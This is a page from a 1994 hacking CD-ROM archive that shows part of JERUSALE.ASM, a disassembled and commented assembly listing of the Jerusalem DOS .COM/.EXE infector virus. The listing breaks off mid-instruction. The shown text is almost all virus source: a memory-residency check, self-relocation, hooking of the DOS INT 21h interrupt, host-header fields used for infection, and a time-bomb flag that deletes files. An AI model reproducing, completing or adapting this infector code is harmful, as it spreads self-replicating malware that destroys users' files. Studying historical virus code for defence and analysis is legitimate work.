Hackers Underworld 2: Forbidden Knowledge

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / JERUSALE.ASM < prev next >

Wrap

Assembly Source File | 1994-07-17 | 39KB | 892 lines

CODE SEGMENT ;The following is a disassembled, structured and commented listing of the ;Jerusalem .COM and .EXE infector virus. All comments, structure inclusions ; ; INTERPATH ; 4423 Cheeney Street ; Santa Clara, CA 95054 ;-----------------------------------------------------------------------; ; THE "JERUSALEM" VIRUS ; ;-----------------------------------------------------------------------; ; ORG 100H ; ; ;-----------------------------------------------------------------------; ; JERUSALEM VIRUS ; ;-----------------------------------------------------------------------; BEGIN_COM: ; COM FILES START HERE JMP CONTINUE ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; A0103 DB 073H,055H MS_DOS DB 'MsDos' ; DB 000H,001H,015H,018H TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! DB 000H A0010 DB 000H A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR OLD_24 DW 0556H,16A5H ;001B A_FLAG DW 7E48H ;??? A0021 DB 000H,000H,000H,000H,000H,000H,000H DB 000H,000H,000H,000H A002C DW 0 ;A SEGMENT DB 000H,000H A0030 DB 000H A0031 DW 0178EH ;OLD ES VALUE A0033 DW 0080H ; ; EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 DW 80H ;COMMAND LINE ADDRESS DW 178EH ;+4 DW 005CH ;FCB #1 ADDRESS DW 178EH ;+8 DW 006CH ;FCB #2 ADDRESS DW 0178EH ;+12 ; HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 HOST_SS DW 347AH ;(AT TIME OF INFECTION) HOST_IP DW 00C5H ; HOST_CS DW 347AH ; ;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF ; A004B DW 0F010H ; A004D DB 82H ; A004E DB 0 ; EXE_HDR DB 1CH DUP (?) ;004F A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST HANDLE DW 0005H ;0070 HOST_ATT DW 0020H ;0072 HOST_DATE DW 0021H ;0074 HOST_TIME DW 002DH ;0076 BLOCK_SIZE DW 512 ;512 BYTES/BLOCK A007A DW 0010H HOST_SIZE DW 27C0H,0001H ;007C HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME COMMAND_COM DB 'COMMAND.COM' DB 1 A0090 DB 0,0,0,0,0 ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; CONTINUE: ; CLD ; MOV AH,0E0H ;DO A ???... INT 21H ; ; CMP AH,0E0H ; JNC L01B5 ; CMP AH,3 ; JC L01B5 ; ; MOV AH,0DDH ; MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE ADD SI,DI ;SI = BEGINNING OF HOST CODE MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) INT 21H ; ; L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H ADD AX,10H ; MOV SS,AX ;SS = TWEEKed CS MOV SP,700H ;SP = END OF OUR CODE (VIRUS) ; ;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF ; PUSH AX ;JMP FAR CS+10H:IP-100H MOV AX,offset BEGIN_EXE - offset BEGIN_COM PUSH AX ; RETF ; ; ;---------------------------------------; ORG 0C5h ; ;---------------------------------------; ; BEGIN_EXE: ;EXE FILES START HERE CLD ; PUSH ES ; ; MOV CS:[A0031],ES ; MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES MOV CS:[EXEC_BLOCK+8],ES ; MOV CS:[EXEC_BLOCK+12],ES ; ; MOV AX,ES ;TWEEK ES SAME AS CS ABOVE ADD AX,10H ; ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE ADD CS:[HOST_SS],AX ; ; MOV AH,0E0H ; INT 21H ; ; CMP AH,0E0H ; JNC L0106 ;00F1 7313 ; CMP AH,3 ; POP ES ;00F6 MOV SS,CS:[HOST_SS] ; MOV SP,CS:[HOST_SP] ; JMP far CS:[HSOT_IP] ; ; L0106: XOR AX,AX ;0106 33C0 MOV ES,AX ;0108 8EC0 MOV AX,ES:[03FC] ;010A 26A1FC03 MOV CS:[A004B],AX ;010E 2EA34B00 MOV AL,ES:[03FE] ;0112 26A0FE03 MOV CS:[A004D],AL ;0116 2EA24D00 MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB POP AX ;0127 58 ADD AX,10H ;0128 051000 MOV ES,AX ;012B 8EC0 PUSH CS ;012D 0E POP DS ;012E 1F MOV CX,710H ;SIZE OF VIRUS CODE SHR CX,1 ;0132 D1E9 XOR SI,SI ;0134 33F6 MOV DI,SI ;0136 8BFE PUSH ES ;0138 06 MOV AX,0142 ;0139 B84201 PUSH AX ;013C 50 JMP 0000:03FC ;013D EAFC030000 ; MOV AX,CS ;0142 8CC8 MOV SS,AX ;0144 8ED0 MOV SP,700H ;0146 BC0007 XOR AX,AX ;0149 33C0 MOV DS,AX ;014B 8ED8 MOV AX,CS:[A004B] ;014D 2EA14B00 MOV [03FC],AX ;0151 A3FC03 MOV AL,CS:[A004D] ;0154 2EA04D00 MOV [03FE],AL ;0158 A2FE03 MOV BX,SP ;015B 8BDC MOV CL,04 ;015D B104 SHR BX,CL ;015F D3EB ADD BX,+10 ;0161 83C310 MOV CS:[A0033],BX ; ; MOV AH,4AH ; MOV ES,CS:[A0031] ; INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS ; MOV AX,3521 ; INT 21H ;GET VECTOR MOV CS:[OLD_21],BX ; MOV CS:[OLD_21+2],ES ; ; PUSH CS ;0181 0E POP DS ;0182 1F MOV DX,offset NEW_INT_21 ;0183 BA5B02 MOV AX,2521 ; INT 21H ;SAVE VECTOR ; MOV ES,[A0031] ;018B 8E063100 MOV ES,ES:[A002C] ;018F 268E062C00 XOR DI,DI ;0194 33FF MOV CX,7FFFH ;0196 B9FF7F XOR AL,AL ;0199 32C0 REPNE SCASB ;019C AE CMP ES:[DI],AL ;019D 263805 LOOPNZ 019B ;01A0 E0F9 MOV DX,DI ;01A2 8BD7 ADD DX,+03 ;01A